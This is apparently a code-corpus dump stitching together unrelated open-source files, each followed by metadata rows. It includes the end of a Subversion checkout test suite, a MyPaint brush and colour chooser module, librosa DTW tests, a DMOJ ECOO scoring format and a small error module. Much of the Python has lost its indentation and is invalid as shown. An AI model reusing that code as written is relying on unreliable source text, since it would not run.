# Create expected status tree for the checkout. Since the obstructing
# kappa and upsilon differ from the repos, they should show as modified.
expected_status = svntest.actions.get_virginal_state(wc_backup, 2)
expected_status.add({
'A/B/upsilon' : Item(status=' ', wc_rev=2),
'A/C/nu' : Item(status=' ', wc_rev=2),
'A/D/H/I' : Item(status=' ', wc_rev=2),
'A/D/H/I/J' : Item(status=' ', wc_rev=2),
'A/D/H/I/K' : Item(status=' ', wc_rev=2),
'A/D/H/I/K/xi' : Item(status=' ', wc_rev=2),
'A/D/H/I/K/eta' : Item(status='C ', wc_rev=2),
'A/D/H/I/L' : Item(status=' ', wc_rev=2),
'A/D/kappa' : Item(status='C ', wc_rev=2),
})
# "Extra" files that we expect to result from the conflicts.
  extra_files = [r'eta\.r0', r'eta\.r2', r'eta\.mine',
                 r'kappa\.r0', r'kappa\.r2', r'kappa\.mine']
# Perform the checkout and check the results in three ways.
# We use --force here because run_and_verify_checkout() will delete
# wc_backup before performing the checkout otherwise.
svntest.actions.run_and_verify_checkout(sbox.repo_url, wc_backup,
expected_output, expected_disk,
[], '--force',
extra_files=extra_files)
svntest.actions.run_and_verify_status(wc_backup, expected_status)
# Some obstructions are still not permitted:
#
# Test that file and dir obstructions scheduled for addition *with*
# history fail when checkout tries to add the same path.
# URL to URL copy of A/D/G to A/D/M.
G_URL = sbox.repo_url + '/A/D/G'
M_URL = sbox.repo_url + '/A/D/M'
svntest.actions.run_and_verify_svn(None, [],
'cp', G_URL, M_URL, '-m', '')
# WC to WC copy of A/D/H to A/D/M. (M is now scheduled for addition
# with history in WC and pending addition from the repos).
D_path = os.path.join(wc_dir, 'A', 'D')
H_path = os.path.join(wc_dir, 'A', 'D', 'H')
M_path = os.path.join(wc_dir, 'A', 'D', 'M')
svntest.actions.run_and_verify_svn(None, [],
'cp', H_path, M_path)
# URL to URL copy of A/B/E/alpha to A/B/F/omicron.
omega_URL = sbox.repo_url + '/A/B/E/alpha'
omicron_URL = sbox.repo_url + '/A/B/F/omicron'
svntest.actions.run_and_verify_svn(None, [],
'cp', omega_URL, omicron_URL,
'-m', '')
# WC to WC copy of A/D/H/chi to /A/B/F/omicron. (omicron is now
# scheduled for addition with history in WC and pending addition
# from the repos).
F_path = os.path.join(wc_dir, 'A', 'B', 'F')
omicron_path = os.path.join(wc_dir, 'A', 'B', 'F', 'omicron')
chi_path = os.path.join(wc_dir, 'A', 'D', 'H', 'chi')
svntest.actions.run_and_verify_svn(None, [],
'cp', chi_path,
omicron_path)
# Try to co M's Parent.
expected_status = svntest.actions.get_virginal_state(wc_dir, 1)
expected_status.add({
'A/B/F/omicron' : Item(status='A ', copied='+', wc_rev='-'),
'A/B/upsilon' : Item(status=' ', wc_rev=2),
'A/C/nu' : Item(status=' ', wc_rev=2),
'A/D/kappa' : Item(status=' ', wc_rev=2),
'A/D/H/I' : Item(status=' ', wc_rev=2),
'A/D/H/I/J' : Item(status=' ', wc_rev=2),
'A/D/H/I/K' : Item(status=' ', wc_rev=2),
'A/D/H/I/K/xi' : Item(status=' ', wc_rev=2),
'A/D/H/I/K/eta' : Item(status=' ', wc_rev=2),
'A/D/H/I/L' : Item(status=' ', wc_rev=2),
'A/D/M' : Item(status='A ', copied='+', wc_rev='-'),
'A/D/M/psi' : Item(status=' ', copied='+', wc_rev='-'),
'A/D/M/chi' : Item(status=' ', copied='+', wc_rev='-'),
'A/D/M/omega' : Item(status=' ', copied='+', wc_rev='-'),
'A/D/M/I' : Item(status='A ', copied='+', wc_rev='-',
                             entry_status=' '), # A/D/M/I is a new op_root
'A/D/M/I/J' : Item(status=' ', copied='+', wc_rev='-'),
'A/D/M/I/K' : Item(status=' ', copied='+', wc_rev='-'),
'A/D/M/I/K/xi' : Item(status=' ', copied='+', wc_rev='-'),
'A/D/M/I/K/eta' : Item(status=' ', copied='+', wc_rev='-'),
'A/D/M/I/L' : Item(status=' ', copied='+', wc_rev='-'),
})
svntest.actions.run_and_verify_status(wc_dir, expected_status)
expected_output = wc.State(wc_dir, {
'A/D/M' : Item(status=' ', treeconflict='C'),
'A/D/M/rho' : Item(status=' ', treeconflict='A'),
'A/D/M/pi' : Item(status=' ', treeconflict='A'),
'A/D/M/tau' : Item(status=' ', treeconflict='A'),
})
expected_disk = wc.State('', {
'gamma' : Item("This is the file 'gamma'.\n"),
'G/pi' : Item("This is the file 'pi'.\n"),
'G/rho' : Item("This is the file 'rho'.\n"),
'G/tau' : Item("This is the file 'tau'.\n"),
'H/I' : Item(),
'H/I/J' : Item(),
'H/I/K' : Item(),
'H/I/K/xi' : Item("This is file 'xi'\n"),
'H/I/K/eta' : Item("This is REPOS file 'eta'\n"),
'H/I/L' : Item(),
'H/chi' : Item("This is the file 'chi'.\n"),
'H/psi' : Item("This is the file 'psi'.\n"),
'H/omega' : Item("This is the file 'omega'.\n"),
'M/I' : Item(),
'M/I/J' : Item(),
'M/I/K' : Item(),
'M/I/K/xi' : Item("This is file 'xi'\n"),
'M/I/K/eta' : Item("This is REPOS file 'eta'\n"),
'M/I/L' : Item(),
'M/chi' : Item("This is the file 'chi'.\n"),
'M/psi' : Item("This is the file 'psi'.\n"),
'M/omega' : Item("This is the file 'omega'.\n"),
'kappa' : Item("This is REPOS file 'kappa'\n"),
})
svntest.actions.run_and_verify_checkout(sbox.repo_url + '/A/D',
D_path,
expected_output,
expected_disk,
[], '--force')
expected_status.tweak('A/D/M', treeconflict='C', status='R ')
expected_status.tweak(
'A/D',
'A/D/G',
'A/D/G/pi',
'A/D/G/rho',
'A/D/G/tau',
'A/D/gamma',
'A/D/kappa',
'A/D/H',
'A/D/H/I',
'A/D/H/I/J',
'A/D/H/I/K',
'A/D/H/I/K/xi',
'A/D/H/I/K/eta',
'A/D/H/I/L', wc_rev=4)
expected_status.add({
'A/D/H/chi' : Item(status=' ', wc_rev=4),
'A/D/H/psi' : Item(status=' ', wc_rev=4),
'A/D/H/omega' : Item(status=' ', wc_rev=4),
'A/D/M/pi' : Item(status='D ', wc_rev=4),
'A/D/M/rho' : Item(status='D ', wc_rev=4),
'A/D/M/tau' : Item(status='D ', wc_rev=4),
})
svntest.actions.run_and_verify_status(wc_dir, expected_status)
# Try to co omicron's parent.
expected_output = wc.State(wc_dir, {
'A/B/F/omicron' : Item(status=' ', treeconflict='C'),
})
expected_disk = wc.State('', {
'omicron' : Item("This is the file 'chi'.\n"),
})
svntest.actions.run_and_verify_checkout(sbox.repo_url + '/A/B/F',
F_path,
expected_output,
expected_disk,
[], '--force')
expected_status.tweak('A/B/F/omicron', treeconflict='C', status='R ')
expected_status.add({
'A/B/F' : Item(status=' ', wc_rev=4),
})
svntest.actions.run_and_verify_status(wc_dir, expected_status)
#----------------------------------------------------------------------
# Test if checking out from the root of a Windows drive is supported.
@SkipUnless(svntest.main.is_os_windows)
def checkout_wc_from_drive(sbox):
"checkout from the root of a Windows drive"
def find_the_next_available_drive_letter():
"find the first available drive"
# get the list of used drive letters, use some Windows specific function.
try:
import win32api
drives=win32api.GetLogicalDriveStrings()
drives=drives.split('\000')
for d in range(ord('G'), ord('Z')+1):
drive = chr(d)
if not drive + ':\\' in drives:
return drive
except ImportError:
# In ActiveState python x64 win32api is not available
for d in range(ord('G'), ord('Z')+1):
drive = chr(d)
if not os.path.isdir(drive + ':\\'):
return drive
return None
# just create an empty folder, we'll checkout later.
sbox.build(create_wc = False)
svntest.main.safe_rmtree(sbox.wc_dir)
os.mkdir(sbox.wc_dir)
# create a virtual drive to the repository folder
drive = find_the_next_available_drive_letter()
if drive is None:
raise svntest.Skip('No drive letter available')
subprocess.call(['subst', drive +':', sbox.repo_dir])
repo_url = 'file:///' + drive + ':/'
wc_dir = sbox.wc_dir
was_cwd = os.getcwd()
try:
expected_wc = svntest.main.greek_state.copy()
expected_output = wc.State(wc_dir, {
'A' : Item(status='A '),
'A/D' : Item(status='A '),
'A/D/H' : Item(status='A '),
'A/D/H/psi' : Item(status='A '),
'A/D/H/chi' : Item(status='A '),
'A/D/H/omega' : Item(status='A '),
'A/D/G' : Item(status='A '),
'A/D/G/tau' : Item(status='A '),
'A/D/G/pi' : Item(status='A '),
'A/D/G/rho' : Item(status='A '),
'A/D/gamma' : Item(status='A '),
'A/C' : Item(status='A '),
'A/mu' : Item(status='A '),
'A/B' : Item(status='A '),
'A/B/E' : Item(status='A '),
'A/B/E/alpha' : Item(status='A '),
'A/B/E/beta' : Item(status='A '),
'A/B/F' : Item(status='A '),
'A/B/lambda' : Item(status='A '),
'iota' : Item(status='A '),
})
svntest.actions.run_and_verify_checkout(repo_url, wc_dir,
expected_output, expected_wc)
wc2_dir = sbox.add_wc_path('2')
expected_output = wc.State(wc2_dir, {
'D' : Item(status='A '),
'D/H' : Item(status='A '),
'D/H/psi' : Item(status='A '),
'D/H/chi' : Item(status='A '),
'D/H/omega' : Item(status='A '),
'D/G' : Item(status='A '),
'D/G/tau' : Item(status='A '),
'D/G/pi' : Item(status='A '),
'D/G/rho' : Item(status='A '),
'D/gamma' : Item(status='A '),
'C' : Item(status='A '),
'mu' : Item(status='A '),
'B' : Item(status='A '),
'B/E' : Item(status='A '),
'B/E/alpha' : Item(status='A '),
'B/E/beta' : Item(status='A '),
'B/F' : Item(status='A '),
'B/lambda' : Item(status='A '),
})
expected_wc = wc.State('', {
'C' : Item(),
'B/E/beta' : Item(contents="This is the file 'beta'.\n"),
'B/E/alpha' : Item(contents="This is the file 'alpha'.\n"),
'B/lambda' : Item(contents="This is the file 'lambda'.\n"),
'B/F' : Item(),
'D/H/omega' : Item(contents="This is the file 'omega'.\n"),
'D/H/psi' : Item(contents="This is the file 'psi'.\n"),
'D/H/chi' : Item(contents="This is the file 'chi'.\n"),
'D/G/rho' : Item(contents="This is the file 'rho'.\n"),
'D/G/tau' : Item(contents="This is the file 'tau'.\n"),
'D/G/pi' : Item(contents="This is the file 'pi'.\n"),
'D/gamma' : Item(contents="This is the file 'gamma'.\n"),
'mu' : Item(contents="This is the file 'mu'.\n"),
})
svntest.actions.run_and_verify_checkout(repo_url + '/A', wc2_dir,
expected_output, expected_wc)
wc3_dir = sbox.add_wc_path('3')
expected_output = wc.State(wc3_dir, {
'H' : Item(status='A '),
'H/psi' : Item(status='A '),
'H/chi' : Item(status='A '),
'H/omega' : Item(status='A '),
'G' : Item(status='A '),
'G/tau' : Item(status='A '),
'G/pi' : Item(status='A '),
'G/rho' : Item(status='A '),
'gamma' : Item(status='A '),
})
expected_wc = wc.State('', {
'H/chi' : Item(contents="This is the file 'chi'.\n"),
'H/psi' : Item(contents="This is the file 'psi'.\n"),
'H/omega' : Item(contents="This is the file 'omega'.\n"),
'G/pi' : Item(contents="This is the file 'pi'.\n"),
'G/tau' : Item(contents="This is the file 'tau'.\n"),
'G/rho' : Item(contents="This is the file 'rho'.\n"),
'gamma' : Item(contents="This is the file 'gamma'.\n"),
})
svntest.actions.run_and_verify_checkout(repo_url + '/A/D', wc3_dir,
expected_output, expected_wc)
finally:
os.chdir(was_cwd)
# cleanup the virtual drive
subprocess.call(['subst', '/D', drive +':'])
#----------------------------------------------------------------------
# list all tests here, starting with None:
test_list = [ None,
checkout_with_obstructions,
forced_checkout_of_file_with_dir_obstructions,
forced_checkout_of_dir_with_file_obstructions,
forced_checkout_with_faux_obstructions,
forced_checkout_with_real_obstructions,
forced_checkout_with_real_obstructions_and_unversioned_files,
forced_checkout_with_versioned_obstruction,
import_and_checkout,
checkout_broken_eol,
checkout_creates_intermediate_folders,
checkout_peg_rev,
checkout_peg_rev_date,
co_with_obstructing_local_adds,
checkout_wc_from_drive
]
if __name__ == "__main__":
svntest.main.run_tests(test_list)
# NOTREACHED
### End of file.
| apache-2.0 | 128,054,262,028,547,570 | 38.816983 | 80 | 0.522237 | false |
dothiko/mypaint | gui/quickchoice.py | 1 | 11387 | # This file is part of MyPaint.
# Copyright (C) 2013 by Andrew Chadwick <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
"""Widgets and popup dialogs for making quick choices"""
## Imports
import abc
import gi
from gi.repository import Gtk
from gi.repository import Gdk
from pixbuflist import PixbufList
import brushmanager
import widgets
import spinbox
import windowing
from lib.observable import event
import gui.colortools
## Module consts
_DEFAULT_PREFS_ID = u"default"
## Interfaces
class Advanceable:
"""Interface for choosers which can be advanced by pressing keys.
Advancing happens if the chooser is already visible and its key is
pressed again. This can happen repeatedly. The actual action
performed is up to the implementation: advancing some some choosers
may move them forward through pages of alternatives, while other
choosers may actually change a brush setting as they advance.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def advance(self):
"""Advances the chooser to the next page or choice.
Choosers should remain open when their advance() method is
invoked. The actual action performed is up to the concrete
implementation: see the class docs.
"""
## Class defs
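# Illustrative sketch (not part of the original module): a minimal conforming
# implementation of the interface above; the class below is hypothetical.
#
#   class PageFlipper (Gtk.VBox):
#       def advance(self):
#           self._page_spinbox.next()   # show the next page, stay open
#
#   Advanceable.register(PageFlipper)   # as done for the real choosers below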
class QuickBrushChooser (Gtk.VBox):
"""A quick chooser widget for brushes"""
## Class constants
_PREFS_KEY_TEMPLATE = u"brush_chooser.%s.selected_group"
ICON_SIZE = 48
## Method defs
def __init__(self, app, prefs_id=_DEFAULT_PREFS_ID):
"""Initialize"""
Gtk.VBox.__init__(self)
self.app = app
self.bm = app.brushmanager
self._prefs_key = self._PREFS_KEY_TEMPLATE % (prefs_id,)
active_group_name = app.preferences.get(self._prefs_key, None)
model = self._make_groups_sb_model()
self.groups_sb = spinbox.ItemSpinBox(model, self._groups_sb_changed_cb,
active_group_name)
active_group_name = self.groups_sb.get_value()
brushes = self.bm.groups[active_group_name][:]
self.brushlist = PixbufList(brushes, self.ICON_SIZE, self.ICON_SIZE,
namefunc=lambda x: x.name,
pixbuffunc=lambda x: x.preview)
self.brushlist.dragging_allowed = False
self.bm.groups_changed += self._update_groups_sb
self.brushlist.item_selected += self._item_selected_cb
scrolledwin = Gtk.ScrolledWindow()
scrolledwin.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.ALWAYS)
scrolledwin.add_with_viewport(self.brushlist)
w = int(self.ICON_SIZE * 4.5)
h = int(self.ICON_SIZE * 5.0)
scrolledwin.set_min_content_width(w)
scrolledwin.set_min_content_height(h)
scrolledwin.get_child().set_size_request(w, h)
        self.pack_start(self.groups_sb, False, False, 0)
        self.pack_start(scrolledwin, True, True, 0)
self.set_spacing(widgets.SPACING_TIGHT)
def _item_selected_cb(self, pixbuf_list, brush):
"""Internal: call brush_selected event when an item is chosen"""
self.brush_selected(brush)
@event
def brush_selected(self, brush):
"""Event: a brush was selected
:param brush: The newly chosen brush
"""
def _make_groups_sb_model(self):
"""Internal: create the model for the group choice spinbox"""
group_names = self.bm.groups.keys()
group_names.sort()
model = []
for name in group_names:
label_text = brushmanager.translate_group_name(name)
model.append((name, label_text))
return model
def _update_groups_sb(self, bm):
"""Internal: update the spinbox model at the top of the widget"""
model = self._make_groups_sb_model()
self.groups_sb.set_model(model)
def _groups_sb_changed_cb(self, group_name):
"""Internal: update the list of brush icons when the group changes"""
self.app.preferences[self._prefs_key] = group_name
self.brushlist.itemlist[:] = self.bm.groups[group_name][:]
self.brushlist.update()
def advance(self):
"""Advances to the next page of brushes."""
self.groups_sb.next()
class BrushChooserPopup (windowing.ChooserPopup):
"""Speedy brush chooser popup"""
def __init__(self, app, prefs_id=_DEFAULT_PREFS_ID):
"""Initialize.
:param gui.application.Application app: main app instance
:param unicode prefs_id: prefs identifier for the chooser
        The prefs identifier forms part of the preferences keys which store
        the layout and which page of the chooser is selected. It should
follow the same syntax rules as Python simple identifiers.
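        For example, with the default prefs_id the popup's layout is kept
        under the "brush_chooser.default" config name and the selected brush
        group under "brush_chooser.default.selected_group" (spelled out from
        the key templates above; illustrative only).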
"""
windowing.ChooserPopup.__init__(
self,
app = app,
actions = [
'ColorChooserPopup',
'ColorChooserPopupFastSubset',
'BrushChooserPopup',
],
config_name = "brush_chooser.%s" % (prefs_id,),
)
self._chosen_brush = None
self._chooser = QuickBrushChooser(app, prefs_id=prefs_id)
self._chooser.brush_selected += self._brush_selected_cb
bl = self._chooser.brushlist
bl.connect("button-release-event", self._brushlist_button_release_cb)
self.add(self._chooser)
def _brush_selected_cb(self, chooser, brush):
"""Internal: update the response brush when an icon is clicked"""
self._chosen_brush = brush
def _brushlist_button_release_cb(self, *junk):
"""Internal: send an accept response on a button release
We only send the response (and close the dialog) on button release to
avoid accidental dabs with the stylus.
"""
if self._chosen_brush is not None:
bm = self.app.brushmanager
bm.select_brush(self._chosen_brush)
self.hide()
self._chosen_brush = None
def advance(self):
"""Advances to the next page of brushes."""
self._chooser.advance()
class QuickColorChooser (Gtk.VBox):
"""A quick chooser widget for colors"""
## Class constants
_PREFS_KEY_TEMPLATE = u"color_chooser.%s.selected_adjuster"
_ALL_ADJUSTER_CLASSES = [
gui.colortools.HCYWheelTool,
gui.colortools.HSVWheelTool,
gui.colortools.PaletteTool,
gui.colortools.HSVCubeTool,
gui.colortools.HSVSquareTool,
gui.colortools.ComponentSlidersTool,
gui.colortools.RingsColorChangerTool,
gui.colortools.WashColorChangerTool,
gui.colortools.CrossedBowlColorChangerTool,
]
_SINGLE_CLICK_ADJUSTER_CLASSES = [
gui.colortools.PaletteTool,
gui.colortools.WashColorChangerTool,
gui.colortools.CrossedBowlColorChangerTool,
]
def __init__(self, app, prefs_id=_DEFAULT_PREFS_ID, single_click=False):
Gtk.VBox.__init__(self)
self._app = app
self._spinbox_model = []
self._adjs = {}
self._pages = []
mgr = app.brush_color_manager
if single_click:
adjuster_classes = self._SINGLE_CLICK_ADJUSTER_CLASSES
else:
adjuster_classes = self._ALL_ADJUSTER_CLASSES
for page_class in adjuster_classes:
name = page_class.__name__
page = page_class()
self._pages.append(page)
self._spinbox_model.append((name, page.tool_widget_title))
self._adjs[name] = page
page.set_color_manager(mgr)
if page_class in self._SINGLE_CLICK_ADJUSTER_CLASSES:
page.connect_after(
"button-release-event",
self._ccwidget_btn_release_cb,
)
self._prefs_key = self._PREFS_KEY_TEMPLATE % (prefs_id,)
active_page = app.preferences.get(self._prefs_key, None)
sb = spinbox.ItemSpinBox(self._spinbox_model, self._spinbox_changed_cb,
active_page)
active_page = sb.get_value()
self._spinbox = sb
self._active_adj = self._adjs[active_page]
self.pack_start(sb, False, False, 0)
self.pack_start(self._active_adj, True, True, 0)
self.set_spacing(widgets.SPACING_TIGHT)
def _spinbox_changed_cb(self, page_name):
self._app.preferences[self._prefs_key] = page_name
self.remove(self._active_adj)
new_adj = self._adjs[page_name]
self._active_adj = new_adj
self.pack_start(self._active_adj, True, True, 0)
self._active_adj.show_all()
def _ccwidget_btn_release_cb(self, ccwidget, event):
"""Internal: fire "choice_completed" after clicking certain widgets"""
self.choice_completed()
return False
@event
def choice_completed(self):
"""Event: a complete selection was made
This is emitted by button-release events on certain kinds of colour
chooser page. Not every page in the chooser emits this event, because
colour is a three-dimensional quantity: clicking on a two-dimensional
popup can't make a complete choice of colour with most pages.
The palette page does emit this event, and it's the default.
"""
def advance(self):
"""Advances to the next color selector."""
self._spinbox.next()
class ColorChooserPopup (windowing.ChooserPopup):
"""Speedy color chooser dialog"""
def __init__(self, app, prefs_id=_DEFAULT_PREFS_ID, single_click=False):
"""Initialize.
:param gui.application.Application app: main app instance
:param unicode prefs_id: prefs identifier for the chooser
:param bool single_click: limit to just the single-click adjusters
        The prefs identifier forms part of the preferences keys which store
        the layout and which page of the chooser is selected. It should
follow the same syntax rules as Python simple identifiers.
"""
windowing.ChooserPopup.__init__(
self,
app = app,
actions = [
'ColorChooserPopup',
'ColorChooserPopupFastSubset',
'BrushChooserPopup',
],
config_name = u"color_chooser.%s" % (prefs_id,),
)
self._chooser = QuickColorChooser(
app,
prefs_id=prefs_id,
single_click=single_click,
)
self._chooser.choice_completed += self._choice_completed_cb
self.add(self._chooser)
def _choice_completed_cb(self, chooser):
"""Internal: close when a choice is (fully) made
Close the dialog on button release only to avoid accidental dabs
with the stylus.
"""
self.hide()
def advance(self):
"""Advances to the next color selector."""
self._chooser.advance()
## Classes: interface registration
Advanceable.register(QuickBrushChooser)
Advanceable.register(QuickColorChooser)
Advanceable.register(BrushChooserPopup)
Advanceable.register(ColorChooserPopup)
| gpl-2.0 | -8,399,897,937,898,774,000 | 32.889881 | 79 | 0.626855 | false |
r9y9/librosa | tests/test_dtw.py | 1 | 4618 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
import librosa
import numpy as np
from scipy.spatial.distance import cdist
from nose.tools import raises
from test_core import srand
import warnings
warnings.resetwarnings()
warnings.simplefilter('always')
@raises(librosa.ParameterError)
def test_1d_input():
    X = np.array([[1], [3], [3], [8], [1]])
    Y = np.array([[2], [0], [0], [8], [7], [2]])
    librosa.dtw(X=X, Y=Y)
def test_dtw_global():
    # Example taken from:
    # Meinard Mueller, Fundamentals of Music Processing
    X = np.array([[1, 3, 3, 8, 1]])
    Y = np.array([[2, 0, 0, 8, 7, 2]])
    gt_D = np.array([[1., 2., 3., 10., 16., 17.],
                     [2., 4., 5., 8., 12., 13.],
                     [3., 5., 7., 10., 12., 13.],
                     [9., 11., 13., 7., 8., 14.],
                     [10, 10., 11., 14., 13., 9.]])
    mut_D, _ = librosa.dtw(X, Y)
    assert np.array_equal(gt_D, mut_D)
def test_dtw_global_supplied_distance_matrix():
    # Example taken from:
    # Meinard Mueller, Fundamentals of Music Processing
    X = np.array([[1, 3, 3, 8, 1]])
    Y = np.array([[2, 0, 0, 8, 7, 2]])
    # Precompute distance matrix.
    C = cdist(X.T, Y.T, metric='euclidean')
    gt_D = np.array([[1., 2., 3., 10., 16., 17.],
                     [2., 4., 5., 8., 12., 13.],
                     [3., 5., 7., 10., 12., 13.],
                     [9., 11., 13., 7., 8., 14.],
                     [10, 10., 11., 14., 13., 9.]])
    # Supply precomputed distance matrix and specify an invalid distance
    # metric to verify that it isn't used.
    mut_D, _ = librosa.dtw(C=C, metric='invalid')
    assert np.array_equal(gt_D, mut_D)
@raises(librosa.ParameterError)
def test_dtw_incompatible_args_01():
    librosa.dtw(C=1, X=1, Y=1)
@raises(librosa.ParameterError)
def test_dtw_incompatible_args_02():
    librosa.dtw(C=None, X=None, Y=None)
def test_dtw_global_diagonal():
    # query is a linear ramp
    X = np.linspace(0.1, 1, 10)
    Y = X
    gt_wp = list(zip(list(range(10)), list(range(10))))[::-1]
    mut_D, mut_wp = librosa.dtw(X, Y, subseq=True, metric='cosine',
                                step_sizes_sigma=np.array([[1, 1]]),
                                weights_mul=np.array([1, ]))
    assert np.array_equal(np.asarray(gt_wp), np.asarray(mut_wp))
def test_dtw_subseq():
    srand()
    # query is a linear ramp
    X = np.linspace(0, 1, 100)
    # database is query surrounded by noise
    noise_len = 200
    noise = np.random.rand(noise_len)
    Y = np.concatenate((noise, noise, X, noise))
    _, mut_wp = librosa.dtw(X, Y, subseq=True)
    # estimated sequence has to match original sequence
    # note the +1 due to python indexing
    mut_X = Y[mut_wp[-1][1]:mut_wp[0][1] + 1]
    assert np.array_equal(X, mut_X)
def test_dtw_subseq_sym():
    Y = np.array([10., 10., 0., 1., 2., 3., 10., 10.])
    X = np.arange(4)
    gt_wp_XY = np.array([[3, 5], [2, 4], [1, 3], [0, 2]])
    gt_wp_YX = np.array([[5, 3], [4, 2], [3, 1], [2, 0]])
    _, mut_wp_XY = librosa.dtw(X, Y, subseq=True)
    _, mut_wp_YX = librosa.dtw(Y, X, subseq=True)
    assert np.array_equal(gt_wp_XY, mut_wp_XY)
    assert np.array_equal(gt_wp_YX, mut_wp_YX)
def test_dtw_fill_off_diagonal_8_8():
    # Case 1: Square matrix (N=M)
    mut_x = np.ones((8, 8))
    librosa.fill_off_diagonal(mut_x, 0.25)
    gt_x = np.array([[1, 1, 0, 0, 0, 0, 0, 0],
                     [1, 1, 1, 0, 0, 0, 0, 0],
                     [0, 1, 1, 1, 0, 0, 0, 0],
                     [0, 0, 1, 1, 1, 0, 0, 0],
                     [0, 0, 0, 1, 1, 1, 0, 0],
                     [0, 0, 0, 0, 1, 1, 1, 0],
                     [0, 0, 0, 0, 0, 1, 1, 1],
                     [0, 0, 0, 0, 0, 0, 1, 1]])
    assert np.array_equal(mut_x, gt_x)
    assert np.array_equal(mut_x, gt_x.T)
def test_dtw_fill_off_diagonal_8_12():
    # Case 2a: N!=M
    mut_x = np.ones((8, 12))
    librosa.fill_off_diagonal(mut_x, 0.25)
    gt_x = np.array([[1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0],
                     [1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0],
                     [0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0],
                     [0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],
                     [0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0],
                     [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0],
                     [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1],
                     [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1]])
    assert np.array_equal(mut_x, gt_x)
    # Case 2b: (N!=M).T
    mut_x = np.ones((8, 12)).T
    librosa.fill_off_diagonal(mut_x, 0.25)
    assert np.array_equal(mut_x, gt_x.T)
| isc | 9,132,003,934,053,464,000 | 28.414013 | 72 | 0.482027 | false |
DMOJ/site | judge/contest_format/ecoo.py | 1 | 5695 | from datetime import timedelta
from django.core.exceptions import ValidationError
from django.db.models import Count, Max, OuterRef, Subquery
from django.template.defaultfilters import floatformat
from django.urls import reverse
from django.utils.html import format_html
from django.utils.safestring import mark_safe
from django.utils.translation import gettext_lazy
from judge.contest_format.default import DefaultContestFormat
from judge.contest_format.registry import register_contest_format
from judge.utils.timedelta import nice_repr
@register_contest_format('ecoo')
class ECOOContestFormat(DefaultContestFormat):
name = gettext_lazy('ECOO')
config_defaults = {'cumtime': False, 'first_ac_bonus': 10, 'time_bonus': 5}
config_validators = {'cumtime': lambda x: True, 'first_ac_bonus': lambda x: x >= 0, 'time_bonus': lambda x: x >= 0}
'''
cumtime: Specify True if cumulative time is to be used in breaking ties. Defaults to False.
first_ac_bonus: The number of points to award if a solution gets AC on its first non-IE/CE run. Defaults to 10.
time_bonus: Number of minutes to award an extra point for submitting before the contest end.
Specify 0 to disable. Defaults to 5.
'''
@classmethod
def validate(cls, config):
if config is None:
return
if not isinstance(config, dict):
raise ValidationError('ECOO-styled contest expects no config or dict as config')
for key, value in config.items():
if key not in cls.config_defaults:
raise ValidationError('unknown config key "%s"' % key)
if not isinstance(value, type(cls.config_defaults[key])):
raise ValidationError('invalid type for config key "%s"' % key)
if not cls.config_validators[key](value):
raise ValidationError('invalid value "%s" for config key "%s"' % (value, key))
def __init__(self, contest, config):
self.config = self.config_defaults.copy()
self.config.update(config or {})
self.contest = contest
def update_participation(self, participation):
cumtime = 0
score = 0
format_data = {}
submissions = participation.submissions.exclude(submission__result__in=('IE', 'CE'))
submission_counts = {
data['problem_id']: data['count'] for data in submissions.values('problem_id').annotate(count=Count('id'))
}
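        # For each problem, the correlated subquery below keeps only the most
        # recent submission; its best score and date drive the bonus logic.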
queryset = (
submissions
.values('problem_id')
.filter(
submission__date=Subquery(
submissions
.filter(problem_id=OuterRef('problem_id'))
.order_by('-submission__date')
.values('submission__date')[:1],
),
)
.annotate(points=Max('points'))
.values_list('problem_id', 'problem__points', 'points', 'submission__date')
)
for problem_id, problem_points, points, date in queryset:
sub_cnt = submission_counts.get(problem_id, 0)
dt = (date - participation.start).total_seconds()
bonus = 0
if points > 0:
# First AC bonus
if sub_cnt == 1 and points == problem_points:
bonus += self.config['first_ac_bonus']
# Time bonus
if self.config['time_bonus']:
bonus += (participation.end_time - date).total_seconds() // 60 // self.config['time_bonus']
format_data[str(problem_id)] = {'time': dt, 'points': points, 'bonus': bonus}
for data in format_data.values():
if self.config['cumtime']:
cumtime += data['time']
score += data['points'] + data['bonus']
participation.cumtime = cumtime
participation.score = score
participation.tiebreaker = 0
participation.format_data = format_data
participation.save()
def display_user_problem(self, participation, contest_problem):
format_data = (participation.format_data or {}).get(str(contest_problem.id))
if format_data:
bonus = format_html('<small> +{bonus}</small>',
bonus=floatformat(format_data['bonus'])) if format_data['bonus'] else ''
return format_html(
'<td class="{state}"><a href="{url}">{points}{bonus}<div class="solving-time">{time}</div></a></td>',
state=(('pretest-' if self.contest.run_pretests_only and contest_problem.is_pretested else '') +
self.best_solution_state(format_data['points'], contest_problem.points)),
url=reverse('contest_user_submissions',
args=[self.contest.key, participation.user.user.username, contest_problem.problem.code]),
points=floatformat(format_data['points']),
bonus=bonus,
time=nice_repr(timedelta(seconds=format_data['time']), 'noday'),
)
else:
return mark_safe('<td></td>')
def display_participation_result(self, participation):
return format_html(
'<td class="user-points"><a href="{url}">{points}<div class="solving-time">{cumtime}</div></a></td>',
url=reverse('contest_all_user_submissions',
args=[self.contest.key, participation.user.user.username]),
points=floatformat(participation.score, -self.contest.points_precision),
cumtime=nice_repr(timedelta(seconds=participation.cumtime), 'noday') if self.config['cumtime'] else '',
)
| agpl-3.0 | 3,515,321,392,959,316,000 | 43.84252 | 119 | 0.597542 | false |
xguse/blacktie | src/blacktie/utils/errors.py | 1 | 2796 | #*****************************************************************************
# errors.py (part of the blacktie package)
#
# (c) 2013 - Augustine Dunn
# James Laboratory
# Department of Biochemistry and Molecular Biology
# University of California Irvine
# [email protected]
#
# Licenced under the GNU General Public License 3.0 license.
#******************************************************************************
"""
####################
errors.py
####################
Code defining custom base error classes to provide a foundation for graceful error handling.
"""
import warnings
class BlacktieError(StandardError):
"""Base class for exceptions in the blacktie package."""
pass
